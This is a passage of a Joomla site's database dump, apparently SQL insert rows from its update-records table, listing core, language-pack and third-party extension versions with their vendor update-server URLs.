',''),(9497,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(9498,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(9499,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(9500,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9501,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9502,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9503,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9504,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9505,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9506,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9507,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9508,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9509,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9510,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9511,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9512,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9513,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9514,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9515,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9516,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9517,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9518,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9519,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9520,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9521,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9522,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9523,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9524,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9525,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9526,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9527,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9528,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9529,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9530,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9531,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9532,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9533,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9534,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9535,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9536,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9537,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9538,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9539,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9540,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9541,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9542,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9543,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9544,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9545,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9546,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9547,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9548,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9549,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9550,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9551,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9552,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(9553,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(9554,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(9555,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(9556,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(9557,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(9558,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(9559,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9560,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9561,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9562,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9563,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9564,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9565,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9566,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9567,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9568,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9569,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9570,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9571,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9572,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9573,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9574,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9575,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9576,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9577,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9578,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9579,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9580,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9581,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9582,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9583,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9584,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9585,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9586,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9587,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9588,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9589,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9590,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9591,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9592,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9593,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9594,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9595,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9596,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9597,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9598,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9599,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9600,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9601,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9602,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9603,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9604,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9605,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9606,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9607,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(9608,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(9609,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(9610,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9611,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9612,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9613,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9614,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9615,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9616,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9617,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9618,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9619,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9620,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9621,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9622,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9623,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9624,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9625,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9626,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9627,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9628,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9629,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9630,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9631,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9632,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9633,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9634,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9635,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9636,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9637,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9638,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9639,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9640,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9641,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9642,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9643,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9644,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9645,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9646,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9647,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9648,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9649,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9650,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9651,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9652,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9653,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9654,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9655,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9656,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9657,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9658,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9659,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9660,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9661,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9662,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9663,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9664,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9665,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9666,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9667,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(9668,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9669,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9670,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9671,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9672,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9673,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9674,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9675,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9676,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9677,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9678,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9679,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9680,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9681,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9682,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9683,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9684,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9685,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9686,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9687,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9688,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(9689,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(9690,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(9691,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(9692,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(9693,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(9694,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(9695,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9696,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9697,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9698,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9699,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9700,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9701,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9702,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9703,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9704,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9705,57,0,'Chinese 